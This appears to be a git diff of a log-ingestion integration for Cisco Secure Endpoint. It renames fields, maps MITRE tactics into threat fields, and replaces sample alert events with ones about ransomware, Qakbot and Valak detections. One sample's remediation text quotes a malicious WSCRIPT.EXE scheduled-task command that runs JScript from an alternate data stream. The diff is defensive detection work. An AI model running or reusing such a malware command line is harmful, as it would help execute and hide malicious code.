+                "ingested": "2021-09-27T00:42:26.818553324Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583840597369422000,\"timestamp\":1610621973,\"timestamp_nanoseconds\":231000000,\"date\":\"2021-01-14T10:59:33+00:00\",\"event_type\":\"Malicious Activity Detection\",\"event_type_id\":1090519105,\"detection\":\"W32.MAP.Ransomware.rewrite\",\"detection_id\":\"6583840593074454529\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mscorsvw.exe\",\"file_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\mscorsvw.exe\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\",\"sha1\":\"c78f4c22dd195a1791472a2c271a0c85b53900d9\",\"md5\":\"75a758a0c5cea48c9922d64a113d0f9d\"},\"parent\":{\"process_id\":480,\"disposition\":\"Clean\",\"file_name\":\"services.exe\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\",\"sha1\":\"ff658a36899e43fec3966d608b4aa4472de7a378\",\"md5\":\"71c85477df9347fe8e7bc55768473fca\"}}}}}",
                 "kind": "alert",
                 "action": "Malicious Activity Detection",
@@ -3357,7 +3357,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.MAP.Ransomware.rewrite",
                     "computer": {
                         "active": true,
@@ -3430,7 +3430,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452616892Z",
+                "ingested": "2021-09-27T00:42:26.818555045Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6701398782847286000,\"timestamp\":1610621970,\"timestamp_nanoseconds\":182000000,\"date\":\"2021-01-14T10:59:30+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621970,\"start_date\":\"2021-01-14T10:59:30+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"file:///C%3A/Windows/SysWOW64/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:59:30.000Z",
@@ -3441,7 +3441,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3516,7 +3516,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452618792Z",
+                "ingested": "2021-09-27T00:42:26.818556805Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136036637603000,\"timestamp\":1610621707,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-14T10:55:07+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621707,\"start_date\":\"2021-01-14T10:55:07+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"file:///C%3A/Windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:55:07.000Z",
@@ -3527,7 +3527,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3602,7 +3602,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:55.452620699Z",
+                "ingested": "2021-09-27T00:42:26.818558514Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066250000100,\"timestamp\":1610621237,\"timestamp_nanoseconds\":250000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:47:17.000Z",
@@ -3613,7 +3613,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3688,7 +3688,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452622602Z",
+                "ingested": "2021-09-27T00:42:26.818560254Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066228000300,\"timestamp\":1610621237,\"timestamp_nanoseconds\":228000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:47:17.000Z",
@@ -3699,7 +3699,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3767,7 +3767,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:55.452624523Z",
+                "ingested": "2021-09-27T00:42:26.818561999Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -3777,7 +3777,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3842,7 +3842,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:55.452626393Z",
+                "ingested": "2021-09-27T00:42:26.818563718Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -3852,7 +3852,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3919,7 +3919,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:55.452628302Z",
+                "ingested": "2021-09-27T00:42:26.818565449Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -3930,7 +3930,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.12081E6CA3-95.SBX.TG",
                     "computer": {
                         "active": true,
diff --git a/packages/cisco_secure_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_secure_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml
index de81b74bce5..731706d16e6 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/cisco_secure_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml
@@ -78,27 +78,98 @@ processors:
       - UNIX
     ignore_failure: true
     if: ctx?.cisco?.secure_endpoint?.start_timestamp != null
-
 - rename:
     field: cisco.secure_endpoint.techniques
-    target_field: cisco.secure_endpoint.mitre_techniques
+    target_field: threat.technique.id
     if: "ctx?.cisco?.secure_endpoint?.techniques != null && ctx?.cisco?.secure_endpoint?.techniques.length > 0 && ctx?.cisco?.secure_endpoint?.techniques[0] instanceof String"
 - rename:
     field: cisco.secure_endpoint.tactics
-    target_field: cisco.secure_endpoint.mitre_tactics
+    target_field: threat.tactic.id
     if: "ctx?.cisco?.secure_endpoint?.tactics != null && ctx?.cisco?.secure_endpoint?.tactics.length > 0 && ctx?.cisco?.secure_endpoint?.tactics[0] instanceof String"
+- script:
+    lang: painless
+    source: |
+        if (ctx?.threat == null) {
+            ctx.threat = new HashMap();
+        }
+        if (ctx?.threat.technique == null) {
+            ctx.threat.technique = new HashMap();
+        }
+        if (ctx?.threat.technique.id == null) {
+            ctx.threat.technique.id = new ArrayList();
+        }
+        if (ctx?.threat.technique.name == null) {
+            ctx.threat.technique.name = new ArrayList();
+        }
+        if (ctx?.threat.technique.reference == null) {
+            ctx.threat.technique.reference = new ArrayList();
+        }
+        for (technique in ctx?.cisco?.secure_endpoint?.techniques) {
+            if (technique.name != null) {
+                if (!ctx?.threat.technique.name.contains(technique.name)) {
+                    ctx?.threat.technique.name.add(technique.name);  
+                }
+            }
+            if (technique.external_id != null) {
+                if (!ctx?.threat.technique.id.contains(technique.external_id)) {
+                    ctx?.threat.technique.id.add(technique.external_id);  
+                }
+            }
+            if (technique.mitre_url != null) {
+                if (!ctx?.threat.technique.reference.contains(technique.mitre_url)) {
+                    ctx?.threat.technique.reference.add(technique.mitre_url);  
+                }
+            }
+        }
+    if: ctx?.cisco?.secure_endpoint?.tactics != null
+- script:
+    lang: painless
+    source: |
+        if (ctx?.threat == null) {
+            ctx.threat = new HashMap();
+        }
+        if (ctx?.threat.tactic == null) {
+            ctx.threat.tactic = new HashMap();
+        }
+        if (ctx?.threat.tactic.id == null) {
+            ctx.threat.tactic.id = new ArrayList();
+        }
+        if (ctx?.threat.tactic.name == null) {
+            ctx.threat.tactic.name = new ArrayList();
+        }
+        if (ctx?.threat.tactic.reference == null) {
+            ctx.threat.tactic.reference = new ArrayList();
+        }
+        for (tactic in ctx?.cisco?.secure_endpoint?.tactics) {
+            if (tactic.name != null) {
+                if (!ctx?.threat.tactic.name.contains(tactic.name)) {
+                    ctx?.threat.tactic.name.add(tactic.name);  
+                }
+            }
+            if (tactic.external_id != null) {
+                if (!ctx?.threat.tactic.id.contains(tactic.external_id)) {
+                    ctx?.threat.tactic.id.add(tactic.external_id);  
+                }
+            }
+            if (tactic.mitre_url != null) {
+                if (!ctx?.threat.tactic.reference.contains(tactic.mitre_url)) {
+                    ctx?.threat.tactic.reference.add(tactic.mitre_url);  
+                }
+            }
+        }
+    if: ctx?.cisco?.secure_endpoint?.tactics != null
 
 ######################
 ## ECS Host Mapping ##
 ######################
-- rename:
-    field: cisco.secure_endpoint.computer.hostname
-    target_field: host.name
-    ignore_missing: true
+- set:
+    field: host.name
+    copy_from: cisco.secure_endpoint.computer.hostname
+    ignore_empty_value: true
 - set:
     field: host.hostname
-    value: "{{ host.name }}"
-    if: ctx?.host?.name != null
+    copy_from: host.name
+    ignore_empty_value: true
 - rename:
     field: cisco.secure_endpoint.computer.user
     target_field: host.user.name
@@ -462,6 +533,9 @@ processors:
     - cisco.secure_endpoint.timestamp_nanoseconds
     - cisco.secure_endpoint.start_date
     - cisco.secure_endpoint.id
+    - cisco.secure_endpoint.threat_hunting.techniques
+    - cisco.secure_endpoint.threat_hunting.tactics
+    - cisco.secure_endpoint.computer.hostname
     ignore_missing: true
 on_failure:
 - set:
diff --git a/packages/cisco_secure_endpoint/data_stream/log/fields/base-fields.yml b/packages/cisco_secure_endpoint/data_stream/log/fields/base-fields.yml
index 777171a4af1..130d12fe60c 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/fields/base-fields.yml
+++ b/packages/cisco_secure_endpoint/data_stream/log/fields/base-fields.yml
@@ -7,9 +7,6 @@
 - name: data_stream.namespace
   type: constant_keyword
   description: Data stream namespace.
-- name: "@timestamp"
-  type: date
-  description: Event timestamp.
 - name: event.module
   type: constant_keyword
   description: Event module
@@ -25,22 +22,3 @@
 - name: input.type
   description: Type of Filebeat input.
   type: keyword
-- name: log.file.path
-  description: Full path to the log file this event came from.
-  example: /var/log/fun-times.log
-  ignore_above: 1024
-  type: keyword
-- name: log.source.address
-  description: Source address from which the log event was read / sent from.
-  type: keyword
-- name: log.flags
-  description: Flags for the log file.
-  type: keyword
-- name: log.offset
-  description: Offset of the entry in the log file.
-  type: long
-- name: tags
-  description: List of keywords used to tag each event.
-  example: '["production", "env2"]'
-  ignore_above: 1024
-  type: keyword
diff --git a/packages/cisco_secure_endpoint/data_stream/log/fields/ecs.yml b/packages/cisco_secure_endpoint/data_stream/log/fields/ecs.yml
index e8a6e3c5dae..c638cd8bfd8 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/fields/ecs.yml
+++ b/packages/cisco_secure_endpoint/data_stream/log/fields/ecs.yml
@@ -82,3 +82,17 @@
   name: source.ip
 - external: ecs
   name: source.port
+- external: ecs
+  name: tags
+- external: ecs
+  name: threat.tactic.id
+- external: ecs
+  name: threat.tactic.reference
+- external: ecs
+  name: threat.tactic.name
+- external: ecs
+  name: threat.technique.id
+- external: ecs
+  name: threat.technique.name
+- external: ecs
+  name: threat.technique.reference
diff --git a/packages/cisco_secure_endpoint/data_stream/log/sample_event.json b/packages/cisco_secure_endpoint/data_stream/log/sample_event.json
index 1f71f309e9b..4c6ce55e5a1 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/sample_event.json
+++ b/packages/cisco_secure_endpoint/data_stream/log/sample_event.json
@@ -1,19 +1,11 @@
 {
-    "@timestamp": "2021-01-14T14:41:05.000Z",
-    "file": {
-        "hash": {
-            "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
-        }
-    },
+    "@timestamp": "2021-01-15T11:59:52.000Z",
     "ecs": {
-        "version": "1.11.0"
+        "version": "1.12.0"
     },
     "related": {
         "hosts": [
-            "Demo_WannaCry_Ransomware"
-        ],
-        "hash": [
-            "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+            "Demo_Threat_Hunting"
         ],
         "ip": [
             "8.8.8.8",
@@ -21,52 +13,122 @@
         ]
     },
     "host": {
-        "name": "Demo_WannaCry_Ransomware",
-        "hostname": "Demo_WannaCry_Ransomware"
+        "name": "Demo_Threat_Hunting",
+        "hostname": "Demo_Threat_Hunting"
+    },
+    "threat": {
+        "technique": {
+            "reference": [
+                "https://attack.mitre.org/techniques/T1005",
+                "https://attack.mitre.org/techniques/T1053",
+                "https://attack.mitre.org/techniques/T1064"
+            ],
+            "name": [
+                "Data from Local System",
+                "Scheduled Task/Job",
+                "Scripting"
+            ],
+            "id": [
+                "T1005",
+                "T1053",
+                "T1064"
+            ]
+        },
+        "tactic": {
+            "reference": [
+                "https://attack.mitre.org/tactics/TA0005"
+            ],
+            "name": [
+                "Defense Evasion"
+            ],
+            "id": [
+                "TA0005"
+            ]
+        }
     },
     "event": {
-        "severity": 2,
-        "ingested": "2021-09-12T17:32:10.094015339Z",
-        "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
-        "kind": "alert",
-        "action": "Quarantine Failure",
-        "id": "6419229331435815000",
-        "category": [
-            "malware"
-        ]
+        "severity": 4,
+        "action": "SecureX Threat Hunting Incident",
+        "ingested": "2021-09-27T00:41:08.619280442Z",
+        "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant.  Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information.  Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n    - Review all activity performed by the user\\r\\n    - Upload any suspicious files to ThreatGrid for analysis\\r\\n    - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n    - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n    - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the 